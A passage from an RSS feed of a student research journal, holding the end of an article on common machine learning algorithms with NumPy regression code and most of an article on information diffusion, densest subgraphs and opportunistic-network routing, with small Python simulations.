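<p>Because the starting centroids are chosen at random, k-means can settle on different clusters from different starts, so in practice it is often run several times and the best result is kept.</p>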



<p>One of the many applications of clustering is in social networks. We may want to find which people on a social network seem to be close friends, so our algorithm would form clusters of people who appear to be close friends.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-10.png" alt="" class="wp-image-1861" width="307" height="171" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-10.png 456w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-10-300x167.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-10-230x128.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-10-350x195.png 350w" sizes="(max-width: 307px) 100vw, 307px" /><figcaption>Figure 9: <a href="http://www.mghassany.com/MLcourse/introduction.html">https://www.mghassany.com/MLcourse/introduction.html</a></figcaption></figure>



<p>A more familiar example in our daily lives is our email inbox, which groups spam emails, update emails, advertisement emails, etc. together.</p>



<p>Furthermore, we can divide clustering into hard clustering and soft clustering. In hard clustering, each data point belongs to exactly one cluster: it is either in a given cluster or not. This is useful when the categories are mutually exclusive, such as whether a movie is good or not. In soft clustering, by contrast, a data point can belong to several clusters, each to some degree. This is more useful when we want to determine which books are similar, since a single book can share features with several groups of books.</p>



<h4 class="wp-block-heading">7.2 <strong>Association</strong></h4>



<p>Association algorithms look for items that tend to occur together, that is, items whose presence depends on each other. For example, take a customer at a supermarket. If this customer has come to buy bread, then it is quite probable that the customer is also looking to buy butter or milk. In this way, we can associate different items based on their dependency on each other. Many companies use this technique to place associated items away from each other in a store, so that the customer sees many other items on the way and may consider buying additional things. An example of the different associations in a store is given below:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-11.png" alt="" class="wp-image-1862" width="445" height="402" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-11.png 752w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-300x271.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-230x208.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-350x316.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-480x434.png 480w" sizes="(max-width: 445px) 100vw, 445px" /><figcaption><br>Figure 10: https://annalyzin.files.wordpress.com/2016/04/association-rules-network-graph2.png</figcaption></figure>
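

<p>Association-rule methods (Apriori is a well-known example, although the report does not name a specific algorithm) commonly score a rule such as “bread → butter” with two quantities: support, the fraction of all baskets that contain the items, and confidence, the fraction of baskets containing the first item that also contain the second. The Python sketch below computes both on a few made-up shopping baskets; the function names are illustrative.</p>

```python
def support(transactions, items):
    """Fraction of transactions that contain every item in `items`."""
    items = set(items)
    return sum(1 for t in transactions if items.issubset(t)) / len(transactions)


def confidence(transactions, antecedent, consequent):
    """Estimated P(consequent | antecedent) = support(A and C) / support(A)."""
    both = set(antecedent) | set(consequent)
    return support(transactions, both) / support(transactions, antecedent)


baskets = [
    {"bread", "butter", "milk"},
    {"bread", "butter"},
    {"bread", "jam"},
    {"milk", "eggs"},
]
print(support(baskets, {"bread", "butter"}))       # 2 of 4 baskets -> 0.5
print(confidence(baskets, {"bread"}, {"butter"}))  # 0.5 / 0.75 -> 0.666...
```

<p>A rule is usually kept only if both numbers clear thresholds chosen by the analyst, which filters out item pairs that co-occur rarely or by chance.</p>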



<h2 class="wp-block-heading">8. <strong>Reinforcement Learning</strong></h2>



<p>In reinforcement learning, the program learns what to do by trial and error in its environment. We can think of it as the program receiving a reward when it does something correct and a penalty when it does something incorrect. Take the analogy of a child: when a child is young, they do not know what is good or bad, and they learn by trying new things. The child may touch something electric, get a shock, and then instinctively stay away from it, because they now know that touching it hurts. A reinforcement learning program works in a similar way. The difference is that a machine can try thousands of actions in one second, and even though it may start by making very bad decisions, it learns over time and its decisions become much more sophisticated. We can simulate giving a program a reward or penalty with a score: if it does something incorrect, the score decreases, and conversely, if it does something correct, the score increases. Because this type of program is based entirely on trial and error on the program’s part, it is also one of the closest things to a machine’s own creativity.</p>



<p>One of the most useful applications of reinforcement learning is simulation. For example, a reinforcement learning program can help design the optimal rocket engine for a launch. If we place our program in a simulated rocket launch environment that responds to its actions, we can ‘reward’ the program when its actions help the launch and ‘punish’ it when they do not.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-12.png" alt="" class="wp-image-1863" width="402" height="291" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-12.png 598w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-300x217.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-550x400.png 550w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-230x167.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-350x253.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-480x348.png 480w" sizes="(max-width: 402px) 100vw, 402px" /><figcaption><br>Figure 11: https://riptutorial.com/machine-learning/example/32668/reinforcement-learning</figcaption></figure>



<h2 class="wp-block-heading">9. <strong>Linear Regression Implementation</strong></h2>



<p>For the linear regression code, we took as input the population of a city (in units of 10,000 people) and its profit (in units of $10,000). We then plotted all of the data points and got the resulting graph:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-13.png" alt="" class="wp-image-1864" width="352" height="236" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-13.png 752w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-300x201.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-230x154.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-350x235.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-480x322.png 480w" sizes="(max-width: 352px) 100vw, 352px" /></figure>



<p>As we can see, the points follow a roughly linear trend, so linear regression is a reasonable model for this data.</p>
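<p>Below is a minimal NumPy sketch of the fitting step. It assumes the usual hypothesis h(x) = θ<sub>0</sub> + θ<sub>1</sub>x and batch gradient descent on the mean squared error cost. It is not the notebook's code. The five data points are hypothetical values lying exactly on y = 1 + 2x, chosen so the result is easy to check, and the learning rate and iteration count are assumptions.</p>

```python
import numpy as np


def fit_linear_regression(x, y, alpha=0.05, iterations=5000):
    """Fit y ~ theta[0] + theta[1] * x by batch gradient descent.

    Minimizes the mean squared error cost
    J(theta) = (1 / (2m)) * sum((X @ theta - y) ** 2).
    """
    x = np.asarray(x, dtype=float)
    y = np.asarray(y, dtype=float)
    m = len(y)
    X = np.column_stack([np.ones(m), x])  # column of ones for the intercept
    theta = np.zeros(2)
    for _ in range(iterations):
        errors = X @ theta - y
        gradient = X.T @ errors / m       # partial derivatives of J
        theta -= alpha * gradient
    return theta


def predict(x, theta):
    """Predicted profit for population value(s) x."""
    return theta[0] + theta[1] * np.asarray(x, dtype=float)


# Hypothetical points: population (10,000s) vs. profit ($10,000s).
population = [1.0, 2.0, 3.0, 4.0, 5.0]
profit = [3.0, 5.0, 7.0, 9.0, 11.0]
theta = fit_linear_regression(population, profit)
print(theta)                 # close to [1, 2]
print(predict(6.0, theta))   # close to 13
```

<p>The learning rate has to be small enough for the updates to converge. With features on a very different scale, such as raw population counts, the features would normally be normalized first.</p>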



<p>The full code can be found at: <a href="https://github.com/ABehniwal/face-recognition/blob/main/Numpy-Linear-Regression.ipynb">https://github.com/ABehniwal/face-recognition/blob/main/Numpy-Linear-Regression.ipynb</a></p>



<h2 class="wp-block-heading">10. <strong>Multi-Linear Regression Implementation</strong></h2>



<p>For the multi-linear regression code, we took as input several features of a car (Engine Size, Cylinders, Fuel Consumption (City), and Fuel Consumption (Comb)) and its resulting CO2 emissions. We then plotted each feature separately against CO2 emissions to see what the individual relationships look like, which produced the following graphs.</p>



<h4 class="wp-block-heading"><strong>10.1 Engine Size Graph</strong></h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-14.png" alt="" class="wp-image-1865" width="445" height="300" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-14.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-300x202.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-230x155.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-350x236.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-480x323.png 480w" sizes="(max-width: 445px) 100vw, 445px" /></figure>



<h4 class="wp-block-heading">10.2 <strong>Cylinders Graph</strong></h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-15.png" alt="" class="wp-image-1866" width="443" height="293" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-15.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-300x199.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-230x153.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-350x232.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-480x318.png 480w" sizes="(max-width: 443px) 100vw, 443px" /></figure>



<h4 class="wp-block-heading"><strong>10.3 Fuel Consumption (City) Graph</strong></h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-16.png" alt="" class="wp-image-1867" width="451" height="304" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-16.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-300x202.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-230x155.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-350x236.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-480x323.png 480w" sizes="(max-width: 451px) 100vw, 451px" /></figure>



<h4 class="wp-block-heading">10.4 <strong>Fuel Consumption (Comb) Graph</strong></h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-17.png" alt="" class="wp-image-1868" width="473" height="314" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-17.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-300x199.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-230x153.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-350x232.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-17-480x318.png 480w" sizes="(max-width: 473px) 100vw, 473px" /></figure>



<p>Again, all of the graphs look fairly linear. However, since we must take multiple features of the car into account, we use multi-linear regression. The full code can be found at: <a href="https://github.com/ABehniwal/face-recognition/blob/main/Multi-Linear-Regression.ipynb">https://github.com/ABehniwal/face-recognition/blob/main/Multi-Linear-Regression.ipynb</a></p>
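<p>With several features, the model extends to CO2 ≈ θ<sub>0</sub> + θ<sub>1</sub>x<sub>1</sub> + ... + θ<sub>4</sub>x<sub>4</sub>. The sketch below solves for θ directly with NumPy's least-squares routine <code>np.linalg.lstsq</code> instead of gradient descent, which may differ from what the notebook does. The feature columns follow the order listed above. Every value is synthetic, generated from made-up coefficients so the fit can be checked; none of it comes from the real dataset.</p>

```python
import numpy as np


def fit_multilinear(X, y):
    """Least-squares fit of y ~ theta[0] + X @ theta[1:]."""
    X = np.asarray(X, dtype=float)
    y = np.asarray(y, dtype=float)
    design = np.column_stack([np.ones(len(X)), X])  # intercept column first
    theta, *_ = np.linalg.lstsq(design, y, rcond=None)
    return theta


def predict(X, theta):
    """Predicted CO2 emissions for each row of features."""
    X = np.asarray(X, dtype=float)
    return theta[0] + X @ theta[1:]


# Synthetic data: columns are engine size, cylinders, fuel consumption (city),
# fuel consumption (comb); the "true" coefficients are invented for the demo.
rng = np.random.default_rng(0)
features = rng.uniform(1.0, 10.0, size=(20, 4))
true_theta = np.array([50.0, 10.0, 5.0, 8.0, 12.0])
co2 = true_theta[0] + features @ true_theta[1:]

theta = fit_multilinear(features, co2)
print(np.round(theta, 3))
```

<p>Because the synthetic targets contain no noise, the fit recovers the invented coefficients. On real data, the residuals would show how much of the variation in emissions the four features leave unexplained.</p>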



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Amanbir Behniwal</h5><p>Amanbir is currently an 11th grader at Vincent Massey Secondary School in Ontario, Canada. He enjoys challenging himself with difficult math and computer science problems by participating in various contests. Amanbir is an avid fan of Barcelona and has been playing soccer for many years. Amongst other things, he likes to read books, help others with problem-solving, and delve deeper into the field of computer science.
</p></figure></div>



<p>The post <a href="https://exploratiojournal.com/the-theory-and-implementation-of-common-machine-learning-algorithms/">The Theory and Implementation of Common Machine Learning Algorithms</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Data Transmission Via Social Network Sites</title>
		<link>https://exploratiojournal.com/data-transmission-via-social-network-sites/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=data-transmission-via-social-network-sites</link>
		
		<dc:creator><![CDATA[Geonwoo Kim]]></dc:creator>
		<pubDate>Sun, 24 Apr 2022 14:22:33 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[data transmission]]></category>
		<category><![CDATA[social networks]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1839</guid>

					<description><![CDATA[<p>Geonwoo Kim<br />
Crean Lutheran High School</p>
<p>The post <a href="https://exploratiojournal.com/data-transmission-via-social-network-sites/">Data Transmission Via Social Network Sites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="405" height="423" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236.jpg" alt="" class="wp-image-1840 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236.jpg 405w, https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236-287x300.jpg 287w, https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236-230x240.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236-350x366.jpg 350w" sizes="(max-width: 405px) 100vw, 405px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: </strong>Geonwoo Kim<br><strong>Mentor</strong>: Dr. Charalampos Tsourakakis<br><em>Crean Lutheran High School</em></p>
</div></div>



<h2 class="wp-block-heading">Introduction</h2>



<p>The advancement of the internet gave way to a new form of online interaction supported by social network sites (SNS). In recent years, the number of social network site users has grown tremendously. Facebook has over one billion users, and Pinterest, Twitter, and Google+ have hundreds of millions each. Sharing information on these sites has changed how people communicate. Through them, an individual can create a public profile, connect with users they know, and share messages, videos, and images. This has led to unpredictable, emergent patterns of sharing, propagation, interaction, and content creation among users. As a result, understanding information diffusion on social network sites has become one of the most important and active research areas. Information diffusion refers to how information spreads among interconnected entities, or nodes, in a network. Studying it helps identify the factors that affect the whole process. Studying data-to-data transmission across social network sites can also benefit sectors such as marketing. In most cases, the data transmitted on social network sites consists of the source content (the images, videos, or text posted) together with geolocation, posting time, and other metadata.</p>
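<p>One standard way to model information diffusion is the independent cascade model, used here purely as an illustration since the article does not commit to a model. In it, each newly informed user gets a single chance to pass the information to each neighbor, succeeding with probability p. The follower graph, the user names, and the uniform probability p below are hypothetical.</p>

```python
import random


def independent_cascade(graph, seeds, p, rng=None):
    """Simulate one run of the independent cascade model.

    graph: dict mapping each user to the users who see their posts.
    seeds: users who post the information first.
    p:     probability that one exposure makes a neighbor share it.
    Returns the set of users the information reaches.
    """
    rng = rng or random.Random()
    informed = set(seeds)
    frontier = list(seeds)
    while frontier:
        next_frontier = []
        for user in frontier:
            for neighbor in graph.get(user, []):
                # Each newly informed user makes one attempt per neighbor.
                if neighbor not in informed and rng.random() < p:
                    informed.add(neighbor)
                    next_frontier.append(neighbor)
        frontier = next_frontier
    return informed


def average_reach(graph, seeds, p, runs=1000, seed=0):
    """Monte Carlo estimate of how many users the information reaches."""
    rng = random.Random(seed)
    total = sum(len(independent_cascade(graph, seeds, p, rng)) for _ in range(runs))
    return total / runs


followers = {
    "ana": ["ben", "cam"],
    "ben": ["dev", "eli"],
    "cam": ["eli"],
    "dev": [],
    "eli": ["fay"],
    "fay": [],
}
print(average_reach(followers, ["ana"], p=0.5))
```

<p>Raising p or choosing better-connected seed users increases the average reach. This is the kind of factor that diffusion studies try to measure.</p>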



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="898" height="880" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image.png" alt="" class="wp-image-1841" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image.png 898w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-300x294.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-768x753.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-230x225.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-350x343.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-480x470.png 480w" sizes="(max-width: 898px) 100vw, 898px" /></figure>



<h2 class="wp-block-heading">Background</h2>



<h4 class="wp-block-heading"><strong>Densest Subgraphs</strong></h4>



<p>According to Dasgupta and Gupta (1), social networks are created by billions of users who carry out various activities, including creating profiles, linking, following, posting content, commenting, and other online interactions. Social media is commonly modeled with graphs whose nodes represent entities, content, themes, and other metadata, and a typical social media graph has properties on both its edges and its nodes. Dasgupta and Gupta (2) also note that research has increasingly focused on finding subgraphs that let analysts determine the connection between two nodes. Even though social media graphs are sparse, many different paths can connect the same two nodes (Faloutsos, McCurley, and Tomkins 1). Unlike in other graph analyses, representing the relationship between two nodes in a social media graph with a single path is therefore limiting. It is essential to compute the connection subgraph between two users as quickly as possible. That subgraph identifies the few most likely paths by which a disease, joke, information leak, or rumor passes from one user to another (Faloutsos, McCurley, and Tomkins 1). More importantly, it makes it easier to uncover unexpected affiliations between individuals or other members. Graphs thus summarize the connection between two SNS users and provide a fast means of determining how data is transmitted between them.</p>
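<p>The point that a single path understates the relationship between two users can be made concrete by counting shortest paths with breadth-first search. This is a deliberately simple illustration, not the connection-subgraph algorithm of Faloutsos, McCurley, and Tomkins. The friendship graph and user names are hypothetical.</p>

```python
from collections import deque


def undirected(edges):
    """Build a symmetric adjacency dict from (user, user) friendship pairs."""
    graph = {}
    for u, v in edges:
        graph.setdefault(u, set()).add(v)
        graph.setdefault(v, set()).add(u)
    return graph


def shortest_path_count(graph, source, target):
    """Return (distance, number of distinct shortest paths) from source to target.

    Returns (None, 0) when target cannot be reached from source.
    """
    dist = {source: 0}
    count = {source: 1}
    queue = deque([source])
    while queue:
        node = queue.popleft()
        for nb in graph.get(node, ()):
            if nb not in dist:                  # first time nb is reached
                dist[nb] = dist[node] + 1
                count[nb] = count[node]
                queue.append(nb)
            elif dist[nb] == dist[node] + 1:    # another shortest route to nb
                count[nb] += count[node]
    if target not in dist:
        return None, 0
    return dist[target], count[target]


friends = undirected([("ana", "ben"), ("ana", "cam"), ("ben", "dev"),
                      ("cam", "dev"), ("dev", "eli")])
print(shortest_path_count(friends, "ana", "eli"))  # (3, 2)
```

<p>Here ana and eli are three hops apart, and the information can travel along two equally short routes, through ben or through cam.</p>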



<p>Graphs are central to studying connections between SNS users because they allow one to map out all the edges and identify the social position of every user. Yazdi et al. (141) note that the best strategy for analyzing data-to-data transmission across social network sites is to use graph theory. The diffusion patterns of information across SNS and its distribution have become a key area of study. However, Yazdi et al. (142) argue that one of the most challenging problems is finding the best and fastest strategy to study data-to-data transmission across SNS. Such a strategy would let researchers predict diffusion paths from actual data, which has many applications in critical areas such as gossip, news, blog postings, virus resource detection, and e-commerce. The popularity of a given news item plays a vital role in determining which nodes it will influence in the future. The nodes it influenced in the past can therefore be used to outline its transmission. In this case, the nodes influenced in the future are predicted as a function of time (Yazdi et al. 142). The Louvain community detection algorithm was widely used in data-to-data transmission research. However, it cannot control the number of clusters or their centers, which made it ineffective, because cluster centers help drive information propagation.</p>



<p>However, the densest subgraph algorithm can overcome these inefficiencies of the Louvain community detection algorithm because it identifies cluster centers more efficiently. Epasto, Lattanzi, and Sozio (1) note that finding densest subgraphs has improved various data analysis tasks, such as distance query indexing, event detection, community detection, and computational biology. Users across SNS have been compared to real communities, since most of them share similar interests or are affiliated with the same company, university, or other organization. In many cases, a sudden appearance of words associated with places, cities, company names, or even people in tweets and posts can signal an event that is about to take place. Densest subgraph algorithms have therefore been used to study data-to-data transmission across SNS. They allow analysts to build a compact representation of node distances in a graph. This in turn allows them to compute the distance between two nodes over time and determine data transmission rates.</p>



<p>New people constantly join SNS while others leave, and friendships form and end. Moreover, new tweets and posts on SNS such as Facebook and Twitter make older ones less interesting. As a result, SNS user communities evolve over time, and new events trigger the formation of new densest subgraphs. Node distances therefore change continually, which calls for frequent re-indexing. This can significantly hinder research into data-to-data transmission across SNS. Such research needs algorithms that keep up with ever-evolving users and large, highly dynamic input data streams.</p>



<p>Moreover, graphs are used to model not only social media but also biological and financial networks. In all of these settings, a common problem is to find a set of nodes with an unusually large number of connections among them. Because social media networks are organized into communities, this leads to a mathematical task known as the densest subgraph problem, which helps detect data-to-data transmission between users. The density of a k-node subgraph is commonly defined as its number of edges divided by the maximum possible number of edges, k(k-1)/2. By finding dense subgraphs, one can determine data-to-data transmission between communities and even narrow it down to metadata such as location and time. Tsourakakis (1) notes that various data mining techniques have been employed for this purpose. Many subgraph techniques try to find near-cliques, and finding near-cliques is NP-hard in general. However, research on alternative formulations has shown that some can be solved efficiently. One example is the triangle-densest subgraph problem studied by Tsourakakis (1), which makes this approach more effective than previous graph mining applications.</p>
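<p>The density definition above can be computed in a few lines: divide the edges present by the k(k-1)/2 possible edges. This sketch assumes an undirected graph stored as a set of <code>frozenset</code> edges. The example graph, a triangle a, b, c plus an extra node d attached to c, is hypothetical.</p>

```python
from itertools import combinations


def subgraph_density(edges, nodes):
    """Density of the subgraph induced by `nodes`: |E(S)| / (k * (k - 1) / 2)."""
    nodes = set(nodes)
    k = len(nodes)
    if k < 2:
        return 0.0
    present = sum(1 for u, v in combinations(nodes, 2)
                  if frozenset((u, v)) in edges)
    return present / (k * (k - 1) / 2)


edges = {frozenset(e) for e in [("a", "b"), ("b", "c"), ("a", "c"), ("c", "d")]}
print(subgraph_density(edges, {"a", "b", "c"}))       # 1.0 (a clique)
print(subgraph_density(edges, {"a", "b", "c", "d"}))  # 4 of 6 possible edges
```

<p>A value of 1.0 means the chosen users form a clique. Near-cliques have values close to 1.</p>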



<p>Various graph density concepts are used to determine the densest subgraph. One is edge density, obtained by dividing the number of edges by the number of nodes. Another fundamental concept is the k-core, the maximal subgraph in which every node has degree at least k. It lets one find the subgraph with the largest minimum degree rather than the largest average degree. The k-core concept was introduced in 1970 by Lick and White and was later analyzed in many other papers (Faragó and Mojaveri 4). The k-core has been widely used in densest subgraph research because it is easy to compute. Therefore, from a mathematical standpoint, the densest subgraph is a strong tool for analyzing data-to-data transmission on social media websites.</p>
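<p>Both measures in this paragraph come from repeatedly removing a node of minimum degree. The sketch below computes each node's core number in one pass. In the same pass, it keeps the intermediate subgraph with the highest edge density |E|/|V|. This greedy "peeling" is Charikar's well-known 2-approximation for the densest subgraph. It is named here as an illustration, not as a method the cited papers prescribe. The simple quadratic minimum search and the example graph (a four-node clique with a two-node tail) are assumptions chosen for readability.</p>

```python
def peel(graph):
    """Greedy min-degree peeling of an undirected graph without self-loops.

    graph: dict node -> set of neighbors (must be symmetric).
    Returns (core_numbers, best_nodes, best_density), where best_density is
    the largest |E(S)| / |S| among the subgraphs S seen while peeling.
    """
    adj = {u: set(vs) for u, vs in graph.items()}
    edges = sum(len(vs) for vs in adj.values()) // 2
    remaining = set(adj)
    core = {}
    current_k = 0
    best_density = edges / len(remaining) if remaining else 0.0
    best_nodes = set(remaining)

    while remaining:
        # Remove a node of minimum degree in the remaining subgraph.
        u = min(remaining, key=lambda n: len(adj[n]))
        current_k = max(current_k, len(adj[u]))
        core[u] = current_k                 # core number never decreases
        for v in adj[u]:
            adj[v].discard(u)
        edges -= len(adj[u])                # adj[u] holds only remaining neighbors
        adj[u] = set()
        remaining.remove(u)
        if remaining and edges / len(remaining) > best_density:
            best_density = edges / len(remaining)
            best_nodes = set(remaining)
    return core, best_nodes, best_density


g = {"a": {"b", "c", "d", "e"}, "b": {"a", "c", "d"}, "c": {"a", "b", "d"},
     "d": {"a", "b", "c"}, "e": {"a", "f"}, "f": {"e"}}
core, best, density = peel(g)
print(core)            # clique nodes have core number 3, the tail nodes 1
print(best, density)   # the clique {a, b, c, d} with density 1.5
```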



<p>On the other hand, transmitting data from one user to another across social media websites is also essential. The development of mobile communications has allowed people to access various SNS on their smartphones. However, the traditional mesh network faces various challenges that make it hard to transmit data from one user to another (Yang, Wu, and Luo 1). This has led to the emergence of the opportunistic network. Unlike the traditional mesh network, it does not require the network size and node locations to be set in advance. In addition, there is no need to establish a complete path between the source node and the target node. The main advantage of the opportunistic network is that nodes exchange data whenever they come into communication range of each other, which allows much faster data exchange between users. Yang, Wu, and Luo (2) note that the opportunistic network will thus help eliminate problems arising from wireless technology networks, such as network delays and network splits. It also makes network communication much less expensive.</p>



<h4 class="wp-block-heading"><strong>Opportunistic Networks</strong></h4>



<p>Opportunistic networks are linked to remote-area network transmission, handheld device networking, in-vehicle networking, and wildlife tracking. With the arrival of 5G networks, tablets, Bluetooth-enabled computers, smartphones, and laptops have increased in number and become widely distributed across large geographical areas. People now carry these devices as they move from place to place, so each device acts as a mobile social node. In traditional signal transmission, interference between nodes hinders data acceptance and thus data transmission. An opportunistic network instead improves broadcast characteristics within the interference range, thereby eliminating node broadcast delay (Yang, Wu, and Luo 2). This leads to low latency and high data throughput across SNS.</p>



<p>More importantly, opportunistic networks on SNS support the store-carry-forward transmission strategy. In this strategy, an intermediate node stores a message, carries it as it moves, and forwards it when it encounters another node. Data can therefore travel from the source node to the destination node even when no network path between them is available (Xiao and Wu 3). However, efficient data transmission in opportunistic networks requires an efficient routing algorithm. Routing in opportunistic networks has been widely studied, and countless routing algorithms have been proposed. Amin Vahdat and David Becker proposed the epidemic routing algorithm, in which nodes pass copies of a message to the nodes they meet. Epidemic routing has been credited with reducing transmission delay and improving both the average hop count and the average delay time. Spyropoulos et al. (253) proposed another algorithm, Spray and Wait, to overcome various shortcomings of epidemic routing. It works in two phases: a spray phase and a wait phase. In the spray phase, the source node spreads L copies of the message to neighboring relay nodes. In the wait phase, each node holding a copy keeps it until it comes into direct contact with the destination node and delivers it. The core aim of Spray and Wait is to limit the number of copies, and thus transmissions, while keeping delivery delay low. It is therefore essential to select the best routing algorithm when setting up opportunistic networks to support faster data transmission across SNS.</p>
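<p>The trade-off between the two routing schemes can be illustrated on a contact trace, which is a time-ordered list of pairwise encounters between devices. The sketch is a simplified "source" variant of Spray and Wait. The source starts with <code>copies</code> copies and hands one to each new node it meets until a single copy remains. After that, every holder waits and delivers only on direct contact with the destination. The trace, node names, and copy budget are hypothetical. The simulation ignores buffer limits and transmission time.</p>

```python
def epidemic(contacts, source, dest):
    """Return (delivery_time, transmissions) for epidemic routing.

    contacts: list of (time, node_a, node_b) encounters sorted by time.
    Every encounter between a carrier and a non-carrier copies the message.
    """
    carriers = {source}
    transmissions = 0
    for t, a, b in contacts:
        if (a in carriers) != (b in carriers):
            carriers.update((a, b))
            transmissions += 1
            if dest in carriers:
                return t, transmissions
    return None, transmissions


def spray_and_wait(contacts, source, dest, copies):
    """Return (delivery_time, transmissions) for a simple source spray-and-wait.

    Spray phase: the source gives one copy to each new node it meets until it
    holds a single copy. Wait phase: holders deliver only directly to dest.
    """
    holding = {source: copies}          # node -> number of copies it holds
    transmissions = 0
    for t, a, b in contacts:
        for carrier, other in ((a, b), (b, a)):
            if carrier not in holding:
                continue
            if other == dest:           # direct delivery to the destination
                return t, transmissions + 1
            if carrier == source and holding[source] > 1 and other not in holding:
                holding[source] -= 1    # spray one copy to a new relay
                holding[other] = 1
                transmissions += 1
                break
    return None, transmissions


trace = [(1, "S", "A"), (2, "S", "B"), (3, "A", "C"), (4, "C", "D"), (5, "B", "D")]
print(epidemic(trace, "S", "D"))           # (4, 4): earlier, more copies sent
print(spray_and_wait(trace, "S", "D", 3))  # (5, 3): fewer transmissions
```

<p>On this trace, epidemic routing delivers one time step sooner but sends one more copy. Spray and Wait is designed around exactly this trade-off.</p>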



<h2 class="wp-block-heading"><strong>Conclusion</strong></h2>



